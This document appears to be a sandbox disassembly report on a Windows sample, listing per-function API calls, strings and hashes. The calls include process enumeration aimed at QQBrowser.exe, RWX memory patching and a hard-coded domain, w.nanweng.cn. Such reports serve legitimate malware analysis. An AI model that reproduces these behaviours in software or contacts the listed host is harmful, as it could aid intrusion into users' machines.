                                                                                                                                                                                                            • Part of subcall function 00513D5F: __onexit.LIBCMT ref: 00513D65
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0046B1D0
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlEnterCriticalSection.NTDLL(00596E38), ref: 00513993
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 005139C6
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(005980A4), ref: 0046B1EB
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(005980A4), ref: 0046B244
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(763B0000,?), ref: 0046B261
                                                                                                                                                                                                          • CLSIDFromString.COMBASE(Shell.Explorer,?,EFE0703F,?,00000000,?,?,?,?,?,?,?,?,?,00000000,0054AFE3), ref: 0046B276
                                                                                                                                                                                                          • CoCreateInstance.COMBASE(?,00000000,00000005,00564970,00000000), ref: 0046B291
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$AddressCreateFromInit_thread_footerInitializeInstanceProcString__onexit
                                                                                                                                                                                                          • String ID: Shell.Explorer
                                                                                                                                                                                                          • API String ID: 431855302-3462212939
                                                                                                                                                                                                          • Opcode ID: b5f9fc79da250f4a2047e6d424e98c563207e2aed768bdeaf1560b4454a17ddd
                                                                                                                                                                                                          • Instruction ID: a560f8fd9a1407668bb8e3818704dd96ee213fc6ffe290408ffc507773f67e3d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5f9fc79da250f4a2047e6d424e98c563207e2aed768bdeaf1560b4454a17ddd
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81817D70A0061AAFDB14DFA4D849FAEBBB8FF49714F100159F905DB390EB74A944CB91
                                                                                                                                                                                                          Function 00483AC0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 88processlibraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlInitializeCriticalSection.NTDLL(00597C18), ref: 00413AAE
                                                                                                                                                                                                            • Part of subcall function 00413A40: __Init_thread_footer.LIBCMT ref: 00413ACA
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlEnterCriticalSection.NTDLL(00597C18), ref: 00413AE5
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlLeaveCriticalSection.NTDLL(00597C18), ref: 00413B41
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00483B30
                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000001), ref: 00483B46
                                                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00483B6A
                                                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00483BA6
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00483BB9
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$Process32$AddressCloseCreateEnterFirstHandleInit_thread_footerInitializeLeaveNextProcSnapshotToolhelp32
                                                                                                                                                                                                          • String ID: QQBrowser.exe$Snap$shot
                                                                                                                                                                                                          • API String ID: 142191753-275083281
                                                                                                                                                                                                          • Opcode ID: 703b145001b9f67260b2335f9d2604852c26ee50beb10ad54e36c8e6a096dde6
                                                                                                                                                                                                          • Instruction ID: 96f938405f9b234ddc3cd4e3ab6be8807641781c1e8fcd67f60a425441f6f87c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 703b145001b9f67260b2335f9d2604852c26ee50beb10ad54e36c8e6a096dde6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC31DE75E00115ABDB10EFA4DC49BEEF7F8EF49715F000599E809D3281E774AB448B64
                                                                                                                                                                                                          Function 0044A880 Relevance: 13.9, APIs: 1, Strings: 8, Instructions: 383sleepCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,00000000,?,00000000), ref: 0044AACC
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                                          • String ID: /qy/png$?p$?p$P}A$js=$png$url$w.nanweng.cn
                                                                                                                                                                                                          • API String ID: 3472027048-2782442111
                                                                                                                                                                                                          • Opcode ID: 74afa54cf65b7d1373d6833aafc43d121e55fb8b6cc574ed6f79126d0d48fa9f
                                                                                                                                                                                                          • Instruction ID: 6d5b0a7da77640b881c1675866e11ab7b5a9b98f5605a488d7309208466c0ee2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74afa54cf65b7d1373d6833aafc43d121e55fb8b6cc574ed6f79126d0d48fa9f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4BE1E370D10258ABFB19DB64CD89BDEBB72BF41308F10825EE005A72C1DB7D5A94CB96
                                                                                                                                                                                                          Function 005312B2 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 88f4e289fd7cd042e0cdd96788d9668369e5f3209cb7a29074b6b389720523cd
                                                                                                                                                                                                          • Instruction ID: 87d9acf5e25aa00db8412d801c4bd33fabfff0a4185627600757bed709b48f02
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 88f4e289fd7cd042e0cdd96788d9668369e5f3209cb7a29074b6b389720523cd
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26C1D274E04A4A9FDB12DFB8C846BADBFB4BF59310F184199E811A7392C7309941CF68
                                                                                                                                                                                                          Function 0041D140 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 158registryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 0041D171
                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0041D1C6
                                                                                                                                                                                                          • RegisterClassExW.USER32(00000030), ref: 0041D1E1
                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,ThumWndClass,00000000,46000000,00000000,00000000,00000208,000000F0,?,00000000,00000000,00000000), ref: 0041D20A
                                                                                                                                                                                                          • SetRectEmpty.USER32(00000024), ref: 0041D29A
                                                                                                                                                                                                            • Part of subcall function 0046B140: RtlInitializeCriticalSection.NTDLL(005980A4), ref: 0046B1B1
                                                                                                                                                                                                            • Part of subcall function 0046B140: __Init_thread_footer.LIBCMT ref: 0046B1D0
                                                                                                                                                                                                            • Part of subcall function 0046B140: RtlEnterCriticalSection.NTDLL(005980A4), ref: 0046B1EB
                                                                                                                                                                                                            • Part of subcall function 0046B140: RtlLeaveCriticalSection.NTDLL(005980A4), ref: 0046B244
                                                                                                                                                                                                            • Part of subcall function 0046B140: GetProcAddress.KERNEL32(763B0000,?), ref: 0046B261
                                                                                                                                                                                                            • Part of subcall function 0046B140: CLSIDFromString.COMBASE(Shell.Explorer,?,EFE0703F,?,00000000,?,?,?,?,?,?,?,?,?,00000000,0054AFE3), ref: 0046B276
                                                                                                                                                                                                            • Part of subcall function 0046B140: CoCreateInstance.COMBASE(?,00000000,00000005,00564970,00000000), ref: 0046B291
                                                                                                                                                                                                            • Part of subcall function 00421B40: RtlInitializeCriticalSection.NTDLL(00597D48), ref: 00421BAE
                                                                                                                                                                                                            • Part of subcall function 00421B40: __Init_thread_footer.LIBCMT ref: 00421BCA
                                                                                                                                                                                                            • Part of subcall function 00421B40: RtlEnterCriticalSection.NTDLL(00597D48), ref: 00421BE5
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$Initialize$CreateEnterInit_thread_footer$AddressClassCursorEmptyFromInstanceLeaveLoadProcRectRegisterStringWindow
                                                                                                                                                                                                          • String ID: 0$ThumWndClass
                                                                                                                                                                                                          • API String ID: 489526686-2620089244
                                                                                                                                                                                                          • Opcode ID: 09dbf71376382246d49a0a98356eeb4732abed6087f5bc6596bdebe5bbb3be5d
                                                                                                                                                                                                          • Instruction ID: 250c36cab393547e0e864f200ea3947e2c97481a1798632d18ce7e27eca3e3b1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09dbf71376382246d49a0a98356eeb4732abed6087f5bc6596bdebe5bbb3be5d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F751AEB0A01708ABE724DF64DC59B8EBBF4FF44704F10851DE519AB680DBB8A548CB99
                                                                                                                                                                                                          Function 0043B0B0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 117libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0043B176
                                                                                                                                                                                                            • Part of subcall function 0043BCD0: RtlInitializeCriticalSection.NTDLL(00598018), ref: 0043BD52
                                                                                                                                                                                                            • Part of subcall function 0043BCD0: __Init_thread_footer.LIBCMT ref: 0043BD6E
                                                                                                                                                                                                            • Part of subcall function 0043BCD0: RtlEnterCriticalSection.NTDLL ref: 0043BD89
                                                                                                                                                                                                            • Part of subcall function 0043BCD0: RtlLeaveCriticalSection.NTDLL(00598018), ref: 0043BE0F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$AddressEnterInit_thread_footerInitializeLeaveProc
                                                                                                                                                                                                          • String ID: A$Shel$cute$lExe$open$www.baidu.com/s?wd=%s&%s
                                                                                                                                                                                                          • API String ID: 3908199253-3770675778
                                                                                                                                                                                                          • Opcode ID: cf357bf981e7ad079372dcd6da146e0fe595968fe6b3e822861ff6851a2f8397
                                                                                                                                                                                                          • Instruction ID: b925b08b0e03e96236e0e07b64d2234ba9f73523150cea09b43ccfb927649aed
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf357bf981e7ad079372dcd6da146e0fe595968fe6b3e822861ff6851a2f8397
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE41E5719006189BDB20DF65CC46BDEB7B8FF08714F0042AEE519A72C1EB75AA44CF94
                                                                                                                                                                                                          Function 0046A500 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58windowsynchronizationsleepCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000096), ref: 0046A51B
                                                                                                                                                                                                          • PostMessageW.USER32(?,00000464,00000000,00000000), ref: 0046A54A
                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000096), ref: 0046A55B
                                                                                                                                                                                                          • SendMessageW.USER32(?,00000465,00000000,00000000), ref: 0046A577
                                                                                                                                                                                                          • Sleep.KERNEL32(0000000A), ref: 0046A588
                                                                                                                                                                                                          • SendMessageW.USER32(?,00000465,00000000,00000000), ref: 0046A596
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Message$ObjectSendSingleWait$PostSleep
                                                                                                                                                                                                          • String ID: gfff
                                                                                                                                                                                                          • API String ID: 1155176049-1553575800
                                                                                                                                                                                                          • Opcode ID: 9497eb4904ac721a7f2473d0367d110811cd20015e4b099a5166a66c894f42ab
                                                                                                                                                                                                          • Instruction ID: 028b849916d0d22fc0270e815e4da6178435d7c03c3400830d893e29c3a98bd7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9497eb4904ac721a7f2473d0367d110811cd20015e4b099a5166a66c894f42ab
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A411C4313407067BE7205F19DC85F677755AB81B49F048435F305AA1E0E662E8119B5A
                                                                                                                                                                                                          Function 00424200 Relevance: 12.2, APIs: 8, Instructions: 191threadmemoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00424231
                                                                                                                                                                                                          • InterlockedCompareExchange.KERNEL32(00597B1C,00000000), ref: 00424239
                                                                                                                                                                                                          • VirtualProtect.KERNEL32(00000000,00010000,00000040,?), ref: 0042426C
                                                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 00424284
                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00424291
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004242C8
                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,?,00000040,?), ref: 004243CE
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004243D8
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CurrentThread$ErrorLastProtectVirtual$CompareExchangeInterlocked
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3841906899-0
                                                                                                                                                                                                          • Opcode ID: a18261fd56c010708a02091f11256a42539a12f3bbf87b46f9a5bc4eefd7b812
                                                                                                                                                                                                          • Instruction ID: 73ba54a59d4c857f74cbfcf82a1ed4fd02bdc67698638d31dc707ef58c814aa2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a18261fd56c010708a02091f11256a42539a12f3bbf87b46f9a5bc4eefd7b812
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A710470B04225DFDB20DF28E80036ABBE2FFA5714F95456BD84597381E739AC46CB89
                                                                                                                                                                                                          Function 00486180 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 141libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlInitializeCriticalSection.NTDLL(00597C18), ref: 00413AAE
                                                                                                                                                                                                            • Part of subcall function 00413A40: __Init_thread_footer.LIBCMT ref: 00413ACA
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlEnterCriticalSection.NTDLL(00597C18), ref: 00413AE5
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlLeaveCriticalSection.NTDLL(00597C18), ref: 00413B41
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004861F0
                                                                                                                                                                                                          • GetFileVersionInfoSizeA.KERNELBASE(?,00000000,?,?,?,00000000,00000000,00000000), ref: 0048623C
                                                                                                                                                                                                          • GetFileVersionInfoA.KERNELBASE(?,00000000,00000000,00000000,?,?,?,?,00000000,00000000,00000000), ref: 00486273
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$FileInfoVersion$AddressEnterInit_thread_footerInitializeLeaveProcSize
                                                                                                                                                                                                          • String ID: %d.%d.%d.%d$\$eA
                                                                                                                                                                                                          • API String ID: 446412201-3353862543
                                                                                                                                                                                                          • Opcode ID: 827db5794c334795b116db1802b559a551622448f2f012836a8679adfd08c2f1
                                                                                                                                                                                                          • Instruction ID: 93930e2c46c3b311bcfa1faeef95bf45aaa0cc7493fd1fb4ac7ebc342745cea8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 827db5794c334795b116db1802b559a551622448f2f012836a8679adfd08c2f1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D851C871900215ABDB50EBA4DC49FEEB7B8AF48314F0545D9E909A7241EB78EF84CB60
                                                                                                                                                                                                          Function 0046A370 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 123COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnableWindow.USER32(?,00000001), ref: 0046A4AA
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 0046A4BB
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 0046A4C2
                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?), ref: 0046A4C7
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$Show$CallbackDispatcherEnableUser
                                                                                                                                                                                                          • String ID: .$progress_text_2
                                                                                                                                                                                                          • API String ID: 2643563226-2071466166
                                                                                                                                                                                                          • Opcode ID: c1bd88f12720634873981be8b1e279e6f1ba1049d8af04cb66bf33b79b59a600
                                                                                                                                                                                                          • Instruction ID: d9be28c9c65cb1140b763adcb3bb0c0c982ad328e8f4b4d5f387a3b095b57222
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1bd88f12720634873981be8b1e279e6f1ba1049d8af04cb66bf33b79b59a600
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40411731A00508BBCB109F68DC49BEFBB64EF55310F114267F805A7291EFB49A609F96
                                                                                                                                                                                                          Function 0041BB20 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(00597CD4), ref: 0041BB8F
                                                                                                                                                                                                            • Part of subcall function 00513D5F: __onexit.LIBCMT ref: 00513D65
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0041BBAB
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlEnterCriticalSection.NTDLL(00596E38), ref: 00513993
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 005139C6
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(00597CD4), ref: 0041BBC6
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(00597CD4), ref: 0041BC67
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footerInitialize__onexit
                                                                                                                                                                                                          • String ID: @/B$d/B
                                                                                                                                                                                                          • API String ID: 916978925-3891156361
